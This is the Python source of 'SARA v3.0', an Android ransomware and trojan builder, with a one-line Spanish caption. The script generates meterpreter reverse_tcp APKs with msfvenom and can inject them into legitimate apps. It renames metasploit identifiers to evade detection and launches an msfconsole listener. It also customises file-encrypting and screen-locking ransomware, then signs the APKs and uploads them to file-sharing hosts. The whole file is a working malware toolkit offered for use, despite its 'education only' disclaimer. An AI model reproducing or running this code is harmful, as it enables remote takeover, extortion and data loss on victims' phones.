Ransowmare para Android y es el script Sara.

1. #!/usr/bin/env python3
2. # -*- coding: utf-8 -*-
3. # style and colors
4. i = '\033[3m'
5. u = '\033[4m'
6. w = '\033[0m'
7. r = '\033[1;91m'
8. g = '\033[1;92m'
9. y = '\033[1;33m'
10. b = '\033[1;94m'
11. d = '\033[90m'
12. # global variable
13. hide = '> /dev/null 2>&1'
14. sara = f'{d}<{b}sara{d}>{w}'
15. user = f'{d}<{g}user{d}>{w}'
16. # import module
17. try:
18. import os
19. import re
20. import sys
21. import time
22. import json
23. import random
24. import datetime
25. import requests
26. import fileinput
27. from PIL import Image
28. except (ModuleNotFoundError):
29. exit(f'''
30. {sara} : It seems there is a module that you have not installed
31. run this command \'{g}pip install -r requirements.txt{w}\'
32. to install it.
33. ''')
34. # banner (sara-v3.0)
35. def banner():
36. os.system("cls" if os.name == "nt" else "clear")
37. print(w+d+" ,, ,,")
38. print(w+d+" ((((( )))))")
39. print(w+d+" (((((( ))))))")
40. print(w+d+" (((((( ))))))")
41. print(w+d+" ((((("+w+b+",r@@@@@@@@@@e,"+w+d+")))))")
42. print(w+d+" ((("+w+b+"@@@@@@@@@@@@@@@@"+w+d+")))")
43. print(w+b+" \@@/"+r+",:::,"+w+b+"\/"+r+",:::,"+w+b+"\@@/")
44. print(w+b+" /@@@|"+r+":::::"+w+b+"||"+r+":::::"+w+b+"|@@@\\")
45. print(w+b+" / @@@\\"+r+"':::'"+w+b+"/\\"+r+"':::'"+w+b+"/@@@ \\ "+w+"'"+r+"Beware of Ransomware"+b+w+"'")
46. print(w+b+" / /@@@@@@@//\\\@@@@@@@\ \\ "+d+"version 3.0"+w)
47. print(w+b+" ( / '@@@@@====@@@@@' \ )")
48. print(w+b+" \( / \ )/")
49. print(w+b+" \ ( ) /")
50. print(w+b+" \ /"+w)
51. # print letter by letter
52. def prints(text):
53. for line in text:
54. print(line, end='', flush=True)
55. time.sleep(0.008)
56. print('')
57. # print truncate strings
58. def truncates(text, maxx=20):
59. if len(text) > maxx: return text[:maxx - 3] + "..."
60. else: return text
61. # search and replace specific string
62. def replace_string(oldstr, newstr, file):
63. text = f'{sara} : add \'{d}{truncates(newstr)}{w}\' on \'{d}{os.path.basename(file)}{w}\' ... '
64. print(text + f'{y}wait{w}', end='\r')
65. os.system(f'sed -i \'s#{oldstr}#{newstr}#g\' {file}')
66. time.sleep(0.05)
67. if not int(os.popen(f'grep -rc \'{newstr}\' {file}', 'r').readline().strip()) > 0: exit(text + f'{r}fail{w}')
68. print(text + f'{g}done{w}')
69. return newstr
70. # search and replace specific string 2
71. def replace_strings(oldstr, newstr, file):
72. replaces = {oldstr:newstr}
73. for line in fileinput.input(file, inplace=True):
74. for search in replaces:
75. replaced = replaces[search]
76. line = line.replace(search,replaced)
77. print(line, end="")
78. # add new icon path (for msfvenom apk)
79. def add_new_icon(icon, path):
80. text = f'{sara} : add \'{d}ic_launcher.png{w}\' into \'{d}mipmap-hdpi-v4{w}\' ... '
81. file = f'{path}/res/mipmap-hdpi-v4/ic_launcher.png'
82. print(text + f'{y}wait{w}', end='\r')
83. os.system(f'mkdir -p {path}/res/mipmap-hdpi-v4/')
84. os.system(f'cp -r {icon} {file} {hide}')
85. if not os.path.isfile(file): exit(text + f'{r}fail{w}')
86. print(text + f'{g}done{w}')
87. text = f'{sara} : add \'{d}ic_launcher.png{w}\' into \'{d}AndroidManifest.xml{w}\' ... '
88. print(text + f'{y}wait{w}', end='\r')
89. os.system(f'sed -i \'s#<application#<application android:icon="@mipmap/ic_launcher"#g\' {path}/AndroidManifest.xml')
90. print(text + f'{g}done{w}')
91. return file
92. # rename versionCode in apktool.yml
93. def rename_version_code(cstr, path):
94. text = f'{sara} : add \'{d}{cstr}{w}\' into \'{d}{path}/apktool.yml{w}\' ... '
95. print(text + f'{y}wait{w}', end='\r')
96. code = os.popen(f'cat {path}/apktool.yml | grep "versionCode"', 'r').readline().strip()
97. os.system(f'sed -i "s/{code}/versionCode: \'{cstr}\'/g" {path}/apktool.yml')
98. time.sleep(0.05)
99. print(text + f'{g}done{w}')
100. return cstr
101. # rename versionName in apktool.yml
102. def rename_version_name(nstr, path):
103. text = f'{sara} : add \'{d}{nstr}{w}\' into \'{d}{path}/apktool.yml{w}\' ... '
104. print(text + f'{y}wait{w}', end='\r')
105. name = os.popen(f'cat {path}/apktool.yml | grep "versionName"', 'r').readline().strip()
106. os.system(f'sed -i "s/{name}/versionName: {nstr}/g" {path}/apktool.yml')
107. time.sleep(0.05)
108. print(text + f'{g}done{w}')
109. return nstr
110. # rename directory
111. def rename_dir(olddir, newdir):
112. text = f'{sara} : rename \'{d}{olddir.split("/")[-1]}{w}\' into \'{d}{newdir.split("/")[-1]}{w}\' ... '
113. print(text + f'{y}wait{w}', end='\r')
114. os.system(f'cp -rf {olddir} {newdir} {hide};rm -rf {olddir}')
115. time.sleep(0.05)
116. if not os.path.isdir(newdir): exit(text + f'{r}fail{w}')
117. print(text + f'{g}done{w}')
118. return newdir
119. # upload file to transfer.sh (primary url) or file.io (second url)
120. def upload_file(file):
121. prints(f'''
122. {sara} : do you want to upload \'{g}{file}{w}\' ?
123.  
124. (1) yes, i want to upload
125. (2) no thanks
126. ''')
127. asks = str(input(f'{user} : '))
128. if asks in ('2', '02'): return False
129. text = f'{sara} : upload \'{d}{file}{w}\' into the link ...'
130. print(text + f'{y}wait{w}', end='\r')
131. link = os.popen(f'curl --upload-file {file} https://transfer.sh/{os.path.basename(file)} --silent', 'r').readline().strip()
132. if 'https' not in link:
133. try:
134. link = re.search('"link":"(.*?)"', os.popen(f'curl -F "file=@{file}" https://file.io --silent','r').read()).group(1)
135. except:
136. print(text + f'{r}fail{w}')
137. return False
138. print(text + f'{g}done{w}')
139. prints(f'''
140. {sara} : your file has been successfully uploaded,
141. here is the download link ...
142.  
143. {y}{link}{w}''')
144. # generate raw trojan using msfvenom (metasploit)
145. def generate_trojan(host, port, name = None):
146. if name == None: name = 'trojan'
147. text = f'{sara} : generate \'{d}{name}.apk{w}\' using msfvenom{w} ... '
148. print(text + f'{y}wait{w}', end='\r')
149. os.system(f'msfvenom -p android/meterpreter/reverse_tcp lhost={host} lport={port} -a dalvik --platform android -o {name}.apk {hide}')
150. if not os.path.isfile(name + '.apk'): exit(text + f'{r}fail{w}')
151. print(text + f'{g}done{w}')
152. return name + '.apk'
153. # generate trojan and infect to original application (metasploit)
154. def generate_infected_trojan(host, port, orig):
155. name = os.path.basename(orig).replace('.apk', '')
156. file = name + '-infected.apk'
157. text = f'{sara} : infection \'{g}{name}.apk{w}\' using msfvenom{w} ... '
158. print(text + f'{y}wait{w}\n')
159. os.system(f'msfvenom -x {orig} -p android/meterpreter/reverse_tcp lhost={host} lport={port} -a dalvik --platform android -o {file}')
160. if not os.path.isfile(file): exit(text + f'{r}fail{w}')
161. text = f'{sara} : infection \'{g}{name}-infected.apk{w}\' using msfvenom{w} ... '
162. print('\n' + w + text + f'{g}done{w}')
163. return file
164. # generate custom file locker ransomware (encrypter)
165. def genertare_file_locker(name, desc, icon):
166. base = 'data/tmp/encrypter.apk'
167. path = name.lower().replace(' ', '')
168. file = path + '.apk'
169. os.system(f'cp -f {base} {file}')
170. decompile(file)
171. replace_string('"app_name">app_name', f'"app_name">{name}', f'{path}/res/values/strings.xml')
172. replace_string('app_name', name, f'{path}/smali/com/termuxhackersid/services/EncryptionService.smali')
173. replace_string('app_name', name, f'{path}/smali/com/termuxhackersid/services/DecryptionService.smali')
174. replace_string('app_desc', desc, f'{path}/smali/com/termuxhackersid/services/EncryptionService.smali')
175. replace_string('app_desc', desc, f'{path}/smali/com/termuxhackersid/ui/MainActivity$a.smali')
176. replace_string('app_desc', desc, f'{path}/smali/com/termuxhackersid/ui/MainActivity.smali')
177. text = f'{sara} : add \'{d}{os.path.basename(icon)}{w}\' into \'{d}ic_launcher{w}\' ... '
178. print(text + f'{y}wait{w}', end='\r')
179. for line in os.popen(f'find -O3 -L {path} -name \'ic_launcher.png\'', 'r').read().splitlines():
180. if os.path.isfile(line):
181. with Image.open(line) as f:
182. X, Z = f.size
183. size = str(X) + 'x' + str(Z)
184. logo = 'lock-' + os.path.basename(icon)
185. os.system(f'cp -R {icon} {logo}')
186. os.system(f'mogrify -resize {size} {logo};cp -R {logo} {line};rm -rf {logo}')
187. else: exit(text + f'{r}fail{w}')
188. print(text + f'{g}done{w}')
189. random_digit = str(random.randint(1,9))
190. random_version = f'{random_digit}.0'
191. rename_version_code(random_digit, path)
192. rename_version_name(f'{random_version} by @{name.lower().replace(" ","")}', path)
193. file = recompile(path)
194. apps = uber_apk_signer(file)
195. upload_file(apps)
196. return apps
197.  
198. # generate custom screen locker ransomware (passprhase)
199. def genertare_screen_locker(name, head, desc, keys, icon):
200. base = 'data/tmp/lockscreen.apk'
201. path = name.lower().replace(' ', '')
202. file = path + '.apk'
203. os.system(f'cp -f {base} {file}')
204. decompile(file)
205. replace_string('"app_name">app_name', f'"app_name">{name}', f'{path}/res/values/strings.xml')
206. replace_string('app_head', head, f'{path}/res/values/strings.xml')
207. replace_string('app_desc', desc, f'{path}/res/values/strings.xml')
208. print(f'{sara} : add \'{d}{keys}{w}\' as passprhase ... {y}wait{w}', end='\r')
209. replace_strings('app_keys', keys, f'{path}/smali/com/termuxhackers/id/MyService$100000000.smali')
210. print(f'{sara} : add \'{d}{keys}{w}\' as \'{d}passprhase{w}\' ... {g}done{w}')
211. text = f'{sara} : add \'{d}{os.path.basename(icon)}{w}\' into \'{d}ic_launcher{w}\' ... '
212. print(text + f'{y}wait{w}', end='\r')
213. for line in os.popen(f'find -O3 -L {path} -name \'ic_launcher.png\'', 'r').read().splitlines():
214. if os.path.isfile(line):
215. with Image.open(line) as f:
216. X, Z = f.size
217. size = str(X) + 'x' + str(Z)
218. logo = 'lock-' + os.path.basename(icon)
219. os.system(f'cp -R {icon} {logo}')
220. os.system(f'mogrify -resize {size} {logo};cp -R {logo} {line};rm -rf {logo}')
221. else: exit(text + f'{r}fail{w}')
222. print(text + f'{g}done{w}')
223. random_digit = str(random.randint(1,9))
224. random_version = f'{random_digit}.0'
225. rename_version_code(random_digit, path)
226. rename_version_name(f'{random_version} by @{name.lower().replace(" ","")}', path)
227. file = recompile(path)
228. apps = uber_apk_signer(file)
229. upload_file(apps)
230. return apps
231.  
232. # listening trojan with msfconsole (metasploit)
233. def start_trojan_listener(host, port):
234. prints(f'''
235. {sara} : redirecting to the metasploit console
236. payload = \'{r}android/meterpreter/reverse_tcp{w}\'
237. with host = \'{y}{host}{w}\' and port = \'{y}{port}{w}\'
238. listening as job (0).
239. ''')
240. os.system(f'msfconsole -q -x "use payload/android/meterpreter/reverse_tcp;set lhost {host};set lport {port};exploit -j"')
241. # signing apk file with uber-apk-signer (JAR)
242. def uber_apk_signer(file):
243. text = f'{sara} : signing \'{d}{file}{w}\' using uber-apk-signer ... '
244. print(text + f'{y}wait{w}', end='\r')
245. sign = os.path.basename(file).replace('.apk', '')
246. os.system(f'java -jar data/bin/ubersigner.jar -a {file} --ks data/key/debug.jks --ksAlias debugging --ksPass debugging --ksKeyPass debugging {hide}')
247. os.system(f'rm -rf {file} *.idsig {hide}')
248. os.system(f'cp -rf {sign}-aligned-signed.apk {sign}.apk {hide}; rm -rf {sign}-aligned-signed.apk {hide}')
249. if not os.path.isfile(f'{sign}.apk'): exit(text + f'{r}fail{w}')
250. print(text + f'{g}done{w}')
251. return sign + '.apk'
252. # decompiling apk file with apktool
253. def decompile(file):
254. text = f'{sara} : decompile \'{d}{file}{w}\' using apktool ... '
255. path = os.path.basename(file).replace('.apk', '')
256. print(text + f'{y}wait{w}', end='\r')
257. os.system(f'apktool d {file} {hide}')
258. if not os.path.isdir(path): exit(text + f'{r}fail{w}')
259. print(text + f'{g}done{w}')
260. os.remove(file)
261. return path
262. # recompiling apk path with apktool (with aapt2 as second options)
263. def recompile(path):
264. text = f'{sara} : recompile \'{d}{path}{w}\' using apktool ... '
265. file = path + '.apk'
266. print(text + f'{y}wait{w}', end='\r')
267. os.system(f'apktool b {path} -o {file} {hide}')
268. if not os.path.isfile(file):
269. print(text + f'{y}wait{w} ({d}aapt2{w})', end='\r')
270. os.system(f'apktool b {path} -o {file} --use-aapt2 {hide}')
271. time.sleep(0.5)
272. if not os.path.isfile(file): exit(text + f'{r}fail{w}')
273. print(text + f'{g}done{w}')
274. os.system(f'rm -rf {path} {hide}')
275. return file
276. # SARA V3.0
277. class __sara__:
278.  
279. def __init__(self):
280. self.user = str(os.popen('whoami', 'r').readline().strip())
281. self.ipv4 = '127.0.0.1'
282. self.data = 'data'
283.  
284. def custom_trojan(self):
285. banner()
286. prints(f'''
287. {sara} : you can fill or leave blank for using
288. default configuration. the default configuration is
289. host = \'{y}{self.ipv4}{w}\' port = \'{y}4444{w}\' name = \'{r}trojan.apk{w}\'
290. and icon = \'{r}data/tmp/icon.png{w}\'.
291.  
292. custom trojan apk (client)
293. ''')
294. name = str(input(f' set app name: '))
295. if not name: name = 'trojan'
296. icon = str(input(f' set app icon: '))
297. if not os.path.isfile(icon): icon = 'data/tmp/icon.png'
298. host = str(input(f' set app host: '))
299. if not host: host = self.ipv4
300. port = str(input(f' set app port: '))
301. if not port: port = '4444'
302. prints(f'''
303. {sara} : well this process takes a few minutes,
304. please be patient until the process is complete
305. ''')
306. file = generate_trojan(host, port, name.replace(' ', '').replace('.apk', '').lower())
307. path = decompile(file)
308. replace_string('MainActivity', name, f'{path}/res/values/strings.xml')
309. add_new_icon(icon, path)
310. for line in os.popen(f'grep -rc \'metasploit\' {path}', 'r').read().splitlines():
311. line = line.split(':')
312. if int(line[1]) > 0: replace_string('metasploit', path, line[0])
313. rename_dir(f'{path}/smali/com/metasploit/', f'{path}/smali/com/{path}/')
314. random_digit = str(random.randint(1,9))
315. random_version = f'{random_digit}.0'
316. rename_version_code(random_digit, path)
317. rename_version_name(f'{random_version} by @{path}', path)
318. apps = recompile(path)
319. apps = uber_apk_signer(apps)
320. upload_file(apps)
321. if not os.path.isfile(apps): exit(f'\n{sara} : sorry, failed to build \'{d}{apps}{w}\' :( \n')
322. prints(f'''
323. {sara} : your trojan apps successfully created
324. the application is saved as \'{g}{apps}{w}\'
325.  
326. do you want to start listener ?
327.  
328. (1) yes, i want to set new host and port
329. (2) yes, i want to use previous host and port
330. (3) no thanks, i want to exit
331. ''')
332. ask = str(input(f'{user} : '))
333. if ask in ('1' , '01'):
334. host = str(input(f'{user} : set host > '))
335. if not host: host = self.ipv4
336. port = str(input(f'{user} : set port > '))
337. if not port: port = '4444'
338. elif ask in ('2', '02'): pass
339. else: exit(f'\n{sara} : process completed successfully ...\n')
340. start_trojan_listener(host, port)
341.  
342. def infect_trojan(self):
343. banner()
344. prints(f'''
345. {sara} : you can fill or leave blank for using default config
346. the default configuration is apps = \'{r}REQUIRED{w}\'
347. host = \'{y}{self.ipv4}{w}\' and port = \'{y}4444{w}\'.
348.  
349. infect trojan apk (client)
350. ''')
351. orig = str(input(f' set ori apps: '))
352. if not os.path.isfile(orig): exit(f'{sara} : file \'{d}{orig}{w}\' doesn\'t exist !')
353. host = str(input(f' set app host: '))
354. if not host: host = self.ipv4
355. port = str(input(f' set app port: '))
356. if not port: port = '4444'
357. prints(f'''
358. {sara} : well this process takes a few minutes,
359. please be patient until the process is complete
360. ''')
361. file = generate_infected_trojan(host, port, orig)
362. upload_file(file)
363. if not os.path.isfile(file): exit(f'\n{sara} : sorry, failed to build \'{d}{file}{w}\' :( \n')
364. prints(f'''
365. {sara} : your trojan apps successfully created
366. the application is saved as \'{g}{file}{w}\'
367.  
368. do you want to start listener ?
369.  
370. (1) yes, i want to set new host and port
371. (2) yes, i want to use previous host and port
372. (3) no thanks, i want to exit
373. ''')
374. ask = str(input(f'{user} : '))
375. if ask in ('1' , '01'):
376. host = str(input(f'{user} : set host > '))
377. if not host: host = self.ipv4
378. port = str(input(f'{user} : set port > '))
379. if not port: port = '4444'
380. elif ask in ('2', '02'): pass
381. else: exit(f'\n{sara} : process completed successfully ...\n')
382. start_trojan_listener(host, port)
383.  
384. def custom_file_locker(self):
385. banner()
386. prints(f'''
387. {sara} : you can fill or leave blank for using default config
388. the default configuration is name = \'{r}File Locker{w}\'
389. desc = \'{r}Your File Have Been Encrypted{w}\'
390. and icon = \'{y}data/tmp/icon.png{w}\'.
391.  
392. custom file locker apk (encrypter)
393. ''')
394. name = str(input(f' set app name: '))
395. if not name: name = 'File Locker'
396. desc = str(input(f' set app desc: '))
397. if not desc: desc = 'Your File Have Been Encrypted'
398. icon = str(input(f' set app icon: '))
399. if not os.path.isfile(icon): icon = 'data/tmp/icon.png'
400. prints(f'''
401. {sara} : well this process takes a few minutes,
402. please be patient until the process is complete
403. ''')
404. file = genertare_file_locker(name, desc, icon)
405. os.system(f'cp -r data/tmp/decrypter.apk .')
406. if not os.path.isfile(file): exit(f'\n{sara} : sorry, failed to build \'{d}{file}{w}\' :( \n')
407. prints(f'''
408. {sara} : your file locker apps successfully created
409. the encrypter is saved as \'{g}{file}{w}\'
410. the decrypter is saved as \'{g}decrypter.apk{w}\'
411. ''')
412.  
413. def custom_screen_locker(self):
414. banner()
415. prints(f'''
416. {sara} : you can fill or leave blank for using default config
417. the default configuration is name = \'{r}Screen Locker{w}\'
418. head = \'{r}Your Phone Is Locked{w}\'
419. desc = \'{r}locked by sara@termuxhackers-id{w}\'
420. icon = \'{y}data/tmp/icon.png{w}\' and keys = \'{y}s3cr3t{w}\'
421.  
422. custom lock screen apk (passprhase)
423. ''')
424. name = str(input(f' set app name: '))
425. if not name: name = 'Screen Locker'
426. head = str(input(f' set app head: '))
427. if not head: head = 'Your Phone Is Locked'
428. desc = str(input(f' set app desc: '))
429. if not desc: desc = 'locked by sara@termuxhackers-id'
430. icon = str(input(f' set app icon: '))
431. if not os.path.isfile(icon): icon = 'data/tmp/icon.png'
432. keys = str(input(f' set app keys: '))
433. if not keys: keys = 's3cr3t'
434. prints(f'''
435. {sara} : well this process takes a few minutes,
436. please be patient until the process is complete
437. ''')
438. file = genertare_screen_locker(name, head, desc, keys, icon)
439. if not os.path.isfile(file): exit(f'\n{sara} : sorry, failed to build \'{d}{file}{w}\' :( \n')
440. prints(f'''
441. {sara} : your screen locker apps successfully created
442. the application is saved as \'{g}{file}{w}\'
443. the secret key (passprhase) \'{g}{keys}{w}\'
444. ''')
445.  
446. def menu(self):
447. banner()
448. prints(f'''
449. {sara} : Hi user, welcome to @{y}SARA{w} :)
450.  
451. {sara} : sara is a simple android ransomware attack
452. this tool is made for education purpose only
453. the author is not responsible for any loses
454. or damage caused by this programs.
455.  
456. {sara} : can i help you ?
457.  
458. (1) build trojan ransomware ({b}metasploit{w})
459. (2) build locker ransomware ({b}filelocker{w})
460. (3) build screen ransomware ({b}screenlock{w})
461. (4) exit!
462. ''')
463. while True:
464. main = str(input(f'{user} : '))
465. if main in ('1', '01'):
466. banner()
467. prints(f'''
468. {sara} : ok, you can choose one ...
469.  
470. (1) build custom trojan ({b}metasploit{w})
471. (2) build trojan and infect ({b}metasploit{w})
472. (3) back to previous
473. ''')
474. while True:
475. main_menu = str(input(f'{user} : '))
476. if main_menu in ('1', '01'): self.custom_trojan()
477. elif main_menu in ('2', '02'): self.infect_trojan()
478. elif main_menu in ('3', '03', 'back'): pass
479. else: print(f'{sara} : sorry, no command found for: {main_menu}'); continue
480. break
481. elif main in ('2', '02'): self.custom_file_locker()
482. elif main in ('3', '03'): self.custom_screen_locker()
483. elif main in ('4', '04', 'exit'): exit(1)
484. else: print(f'{sara} : sorry, no command found for: {main}'); continue
485. break
486. input(f'{sara} : press enter for back to \'{g}main menu{w}\' (enter) ')
487. self.menu()
488.  
489. if __name__ == '__main__':
490. try: __sara__().menu()
491. except KeyboardInterrupt: exit(1)